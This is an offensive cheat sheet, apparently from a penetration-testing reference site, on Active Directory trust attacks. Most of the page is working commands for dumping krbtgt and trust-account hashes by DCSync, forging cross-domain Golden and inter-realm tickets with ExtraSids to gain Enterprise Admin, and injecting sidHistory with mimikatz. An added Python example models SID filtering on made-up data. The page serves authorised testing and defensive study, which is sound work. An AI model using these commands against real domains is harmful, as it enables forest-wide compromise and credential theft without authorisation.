Service bank
DIRECTORY / AD 88/tcp 389/tcp

AD Trust Attacks

aka Trust Attacks, Cross-Domain, Cross-Forest, SID History, ExtraSids

Active Directory trust exploitation: cross-domain Golden ticket with ExtraSids, SID history abuse for forest compromise, inter-forest ticket forging, child-to-parent escalation, trust enumeration with BloodHound and PowerView.

Ports

Port  Proto  Notes
88    tcp    Kerberos — trust ticket operations
389   tcp    LDAP — trust enumeration

Fingerprint

  • Trusts are visible in BloodHound's TrustedBy edges between Domain nodes
  • PowerView Get-DomainTrust enumerates all inbound/outbound trusts

Key files

Path / object               Holds                                                                                    Sensitive
krbtgt account (child DC)   NT hash of the child domain's krbtgt; signs a Golden ticket with ExtraSids for forest escalation   yes

Exploitation primitives

  • Child-to-parent escalation: compromise a child domain → forge a TGT with the child krbtgt key and the forest root's Enterprise Admins SID (ROOT_SID-519) in ExtraSids → the root DC honours it, giving forest root DA
  • SID History abuse: write the parent's privileged group SID into a child user's sidHistory (or into the PAC's ExtraSids of a Golden ticket); intra-forest SIDHistory is never filtered
  • Cross-forest: SID Filtering on forest and external trusts drops SIDs that do not belong to the trusted side, so this only works where filtering is relaxed (QUARANTINED_DOMAIN cleared on an external trust, TREAT_AS_EXTERNAL on a forest trust), and a relaxed forest trust still drops foreign RIDs below 1000
  • Trust account key (trust password hash) allows forging inter-realm referral TGTs to the trusted domain

Trust Enumeration

PowerView

# All domain trusts
Get-DomainTrust

# All forest trusts
Get-ForestTrust
Get-ForestDomain

# Trust from a specific domain
Get-DomainTrust -Domain child.domain.local

# Enumerate all trusts recursively
Get-DomainTrustMapping

BloodHound

# Find all trust relationships
MATCH (d1:Domain)-[r:TrustedBy]->(d2:Domain) RETURN d1.name, r, d2.name

# Trusts with specific direction
MATCH p=(d1:Domain {name: "CHILD.LOCAL"})-[:TrustedBy]->(d2:Domain) RETURN p

nxc / ldapsearch

# Enumerate trusts via LDAP (NetExec enum_trusts module; --trusted-for-delegation lists delegation, not trusts)
nxc ldap DC_IP -u user -p pass -M enum_trusts

# Raw LDAP: trustedDomain objects live in the System container
ldapsearch -x -H ldap://DC_IP -D 'user@domain.local' -w pass -b 'CN=System,DC=domain,DC=local' \
  '(objectClass=trustedDomain)' name flatName trustDirection trustType trustAttributes securityIdentifier

Trust Terminology

Term              Meaning
Parent-Child      Automatic two-way transitive trust within a forest
Forest Trust      Between the root domains of two separate AD forests; transitive across both forests
External Trust    Between two individual domains in different forests (non-transitive)
Shortcut Trust    Manual trust between two domains in the same forest, to shorten the referral path
Transitive        Trust extends to all domains trusted by the trusted domain
One-way inbound   Seen from the enumerated domain: the other domain trusts this one, so this domain's users can reach the other's resources (outbound is the reverse; access flows opposite to the direction of trust)
SID Filtering     DC-side check that drops PAC SIDs not belonging to the trusted side; blocks cross-forest SID History / ExtraSids injection

Child Domain → Parent Domain (ExtraSids)

The most common trust attack: compromise a child domain, then escalate to the forest root.

Requirements

  • krbtgt hash of the child domain
  • SID of the parent domain’s Enterprise Admins group
  • Child domain SID

Get required values

# Child krbtgt hash (DCSync against a child DC; needs DA or replication rights in the child)
mimikatz: lsadump::dcsync /domain:child.domain.local /user:krbtgt
secretsdump.py -just-dc-user krbtgt child.domain.local/admin:pass@CHILD_DC_IP

# Child domain SID
Get-DomainSID -Domain child.domain.local

# Forest root (parent) domain SID; Enterprise Admins only exists in the forest root
Get-DomainSID -Domain domain.local
# Enterprise Admins SID = PARENT_SID-519 (root Domain Admins = PARENT_SID-512)

# impacket alternative: lookupsid.py prints the domain SID of the DC it is pointed at and resolves RIDs,
# so query the parent DC for the parent SID / Enterprise Admins and the child DC for the child SID
lookupsid.py child.domain.local/user:pass@CHILD_DC_IP | grep "Domain SID"
lookupsid.py domain.local/user:pass@PARENT_DC_IP | grep -iE "Domain SID|enterprise admins"

Forge the cross-domain Golden ticket (ExtraSids)

# Impacket ticketer (writes Administrator.ccache)
ticketer.py \
  -nthash CHILD_KRBTGT_HASH \
  -domain-sid CHILD_DOMAIN_SID \
  -domain child.domain.local \
  -extra-sid PARENT_DOMAIN_SID-519 \
  -user-id 500 \
  Administrator

export KRB5CCNAME=Administrator.ccache

# DCSync the parent domain with the forged ticket: keep the child realm in the target string so
# impacket finds the TGT in the ccache, and address the parent DC by FQDN (Kerberos needs the name)
secretsdump.py -k -no-pass -just-dc-ntlm child.domain.local/Administrator@PARENT_DC.domain.local

# Rubeus (Windows): forge and inject into the current logon session
.\Rubeus.exe golden /rc4:CHILD_KRBTGT_HASH /domain:child.domain.local /sid:CHILD_SID /sids:PARENT_SID-519 /user:Administrator /ptt

# Mimikatz: /ptt injects; use /ticket: instead to save a .kirbi, then convert it to a ccache for Linux tooling
kerberos::golden /user:Administrator /domain:child.domain.local /sid:CHILD_SID /krbtgt:CHILD_KRBTGT_HASH /sids:PARENT_SID-519 /ptt
kerberos::golden /user:Administrator /domain:child.domain.local /sid:CHILD_SID /krbtgt:CHILD_KRBTGT_HASH /sids:PARENT_SID-519 /ticket:Administrator.kirbi
misc::convert ccache Administrator.kirbi

SID History Abuse

If SID History is not filtered on a trust, inject another domain’s group SID into the sidHistory attribute of a user account:

# Check the user's current SID history
Get-DomainUser -Identity attacker | Select-Object -ExpandProperty sidhistory

# Inject the parent's Enterprise Admins SID with mimikatz (run on a child DC as SYSTEM / domain admin);
# sid::patch hooks ntdsai.dll so the normally write-protected sidHistory attribute can be set,
# and fails on DC builds mimikatz has no pattern for
mimikatz: privilege::debug
mimikatz: sid::patch
mimikatz: sid::add /sam:attacker /new:PARENT_DOMAIN_SID-519

# Verify the write
Get-DomainUser -Identity attacker | Select-Object -ExpandProperty sidhistory

When the child domain user authenticates to the parent, the PAC includes the injected SID → treated as Enterprise Admin.


Cross-Forest Trust Attack (SID Filtering Disabled)

SID Filtering on a forest or external trust makes the target DC drop PAC SIDs that do not belong to the trusted side, which is what stops ExtraSids and SID History across forests. Read the state from TrustAttributes:

# Check SID Filtering status
Get-DomainTrust | Select-Object SourceName, TargetName, TrustDirection, TrustAttributes
# External trust: QUARANTINED_DOMAIN present = quarantine (SID Filtering) on; absent = off
# Forest trust (FOREST_TRANSITIVE): filtering is on by default even without QUARANTINED_DOMAIN;
# TREAT_AS_EXTERNAL means SID history was enabled (netdom trust /enablesidhistory:yes) and
# foreign SIDs with RID >= 1000 are accepted while RID < 1000 (512, 519 and other well-known RIDs) are still dropped

Attack:

  1. Create a Golden ticket for the source forest with the target forest's privileged group SID in extra-sids. Against a forest trust with TREAT_AS_EXTERNAL use a custom group (RID >= 1000) that holds the privileges, since 512/519 are filtered.
  2. Access resources in the target forest; the referral to the target KDC carries the forged PAC.
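A check that ties the three previous sections together (child-to-parent ExtraSids, SID History, and this cross-forest case), as an added Python example that is not part of the original page: it decodes the trustDirection / trustType / trustAttributes values of trustedDomain objects into the names PowerView prints, classifies which SID-filtering regime the target DC applies, and runs a forged PAC through that regime to show which ExtraSids survive. The trust objects, domain SIDs and PAC are constructed for the example; the filtering logic is a simplified model of the MS-ADTS rules (intra-forest: nothing dropped; quarantine and default forest trust: only SIDs from the trusted side kept; relaxed trusts: foreign SIDs kept only with RID >= 1000), which is an assumption of this example rather than a full implementation.

```python
import re

# trustAttributes bit flags (MS-ADTS); these are the names PowerView prints
TRUST_ATTRIBUTES = {
    0x1: "NON_TRANSITIVE",
    0x2: "UPLEVEL_ONLY",
    0x4: "QUARANTINED_DOMAIN",
    0x8: "FOREST_TRANSITIVE",
    0x10: "CROSS_ORGANIZATION",
    0x20: "WITHIN_FOREST",
    0x40: "TREAT_AS_EXTERNAL",
    0x80: "USES_RC4_ENCRYPTION",
    0x200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x400: "PIM_TRUST",
    0x800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}
TRUST_DIRECTION = {0: "Disabled", 1: "Inbound", 2: "Outbound", 3: "Bidirectional"}
TRUST_TYPE = {1: "WINDOWS_NON_ACTIVE_DIRECTORY", 2: "WINDOWS_ACTIVE_DIRECTORY", 3: "MIT", 4: "DCE"}
SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def decode_attributes(value):
    return [name for bit, name in sorted(TRUST_ATTRIBUTES.items()) if value & bit]


def sid_filtering_mode(attrs):
    """Filtering regime the target DC applies to SIDs arriving over this trust
    (simplified model, an assumption of this example)."""
    if attrs & 0x20:                      # WITHIN_FOREST: nothing is filtered
        return "none"
    if attrs & 0x8:                       # FOREST_TRANSITIVE
        return "forest-relaxed" if attrs & 0x40 else "forest"
    return "quarantine" if attrs & 0x4 else "external-relaxed"


def describe_trust(obj):
    """Summarise one trustedDomain object the way Get-DomainTrust does."""
    attrs = obj["trustAttributes"]
    return {"name": obj["name"],
            "direction": TRUST_DIRECTION.get(obj["trustDirection"], "?"),
            "type": TRUST_TYPE.get(obj["trustType"], "?"),
            "attributes": decode_attributes(attrs),
            "sid_filtering": sid_filtering_mode(attrs)}


def split_sid(sid):
    m = SID_RE.match(sid)
    if not m:
        raise ValueError("not a domain SID: " + sid)
    return m.group(1), int(m.group(2))


def accepted_sids(mode, trusted_domains, pac_sids):
    """PAC SIDs the target DC keeps. trusted_domains holds the domain SIDs of the
    trusted side (every domain of the forest for a forest trust)."""
    kept = []
    for sid in pac_sids:
        domain, rid = split_sid(sid)
        if mode == "none" or domain in trusted_domains:
            kept.append(sid)
        elif mode.endswith("relaxed") and rid >= 1000:   # foreign SIDHistory survives only above RID 999
            kept.append(sid)
    return kept


# Constructed sample data: SRC is the attacker-controlled domain, TGT the target domain,
# SAMPLE_TRUSTS mimics (objectClass=trustedDomain) objects as seen on the TGT side
SRC = "S-1-5-21-444-555-666"
TGT = "S-1-5-21-111-222-333"
SAMPLE_TRUSTS = [
    {"name": "child.domain.local", "trustDirection": 3, "trustType": 2, "trustAttributes": 0x20},
    {"name": "other.forest",       "trustDirection": 3, "trustType": 2, "trustAttributes": 0x8},
    {"name": "legacy.forest",      "trustDirection": 3, "trustType": 2, "trustAttributes": 0x48},
    {"name": "ext.corp",           "trustDirection": 1, "trustType": 2, "trustAttributes": 0x5},
]
# Forged PAC: the SRC user and Domain Users, plus ExtraSids for TGT's Enterprise Admins (519)
# and a custom TGT group (1105)
FORGED_PAC = [SRC + "-1104", SRC + "-513", TGT + "-519", TGT + "-1105"]


def enterprise_admins_sid(forest_root_sid):
    return forest_root_sid + "-519"


def main():
    for t in SAMPLE_TRUSTS:
        d = describe_trust(t)
        kept = accepted_sids(d["sid_filtering"], {SRC}, FORGED_PAC)
        print(f"{d['name']:20} {d['direction']:13} {','.join(d['attributes']) or '-':38} "
              f"filtering={d['sid_filtering']:16} EA kept={enterprise_admins_sid(TGT) in kept}")


if __name__ == "__main__":
    main()
```

Run as is, the table shows the four outcomes the page describes: the WITHIN_FOREST trust passes the Enterprise Admins SID untouched, the default forest trust and the quarantined external trust drop every TGT-side SID, and the TREAT_AS_EXTERNAL forest trust keeps the custom RID 1105 group while still dropping 519.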

Trust Account Password (Inter-Realm Referral Tickets)

Each side of a trust holds an inter-domain trust account named after the other domain's NetBIOS name (e.g. TARGET$ in source.domain.local). Its key is the trust key that encrypts referral (inter-realm) TGTs, so with it you can forge a referral ticket for the trusted domain and present it to that domain's KDC for service tickets. The trust password rotates automatically (every 30 days), so dump it fresh.

# Get the trust account hash via DCSync (needs DA / replication rights in the source domain)
secretsdump.py -just-dc-user 'TARGET$' source.domain.local/admin:pass@SOURCE_DC_IP

# Forge the inter-realm referral ticket: a TGS for krbtgt/TARGET encrypted with the trust key, carrying the
# target-side SID you want in ExtraSids (still subject to SID Filtering on that trust, see above)
ticketer.py \
  -nthash TRUST_ACCOUNT_HASH \
  -domain-sid SOURCE_SID \
  -domain source.domain.local \
  -spn krbtgt/TARGET.domain.local \
  -extra-sid TARGET_SID-519 \
  Administrator

# Present the referral ticket to the target KDC in a TGS-REQ for a real service ticket (Windows):
ticketConverter.py Administrator.ccache Administrator.kirbi
.\Rubeus.exe asktgs /ticket:Administrator.kirbi /service:cifs/DC.TARGET.domain.local /dc:DC.TARGET.domain.local /ptt

Enumeration: Checking for Attack Surface

# Identify all forest domains
Get-ForestDomain | Select Name

# Check trust direction and transitivity
Get-DomainTrust | Select SourceName, TargetName, TrustDirection, TrustType, TrustAttributes

# Find users with SID History
Get-DomainUser -LDAPFilter "(sidHistory=*)" | Select-Object samaccountname, sidhistory

# Cross-domain BloodHound collection
bloodhound-python -u user -p pass -d source.domain.local -ns DC_IP -c All --zip
# Repeat for target domain — upload both zips to see cross-forest paths

Notes

  • Intra-forest trusts (parent-child, shortcut) are transitive and carry WITHIN_FOREST, so nothing is SID-filtered: the forest, not the domain, is the security boundary, and a compromised child domain always reaches the forest root.
  • Cross-forest trusts have SID Filtering enabled by default, so ExtraSids won't work unless filtering is relaxed (QUARANTINED_DOMAIN cleared on an external trust, TREAT_AS_EXTERNAL on a forest trust); a relaxed forest trust still drops foreign RIDs below 1000, so target a custom privileged group (RID >= 1000) there rather than 512/519.
  • Always check TrustAttributes for FOREST_TRANSITIVE, TREAT_AS_EXTERNAL and QUARANTINED_DOMAIN, and TrustDirection: you can only traverse a trust from the side that is trusted.
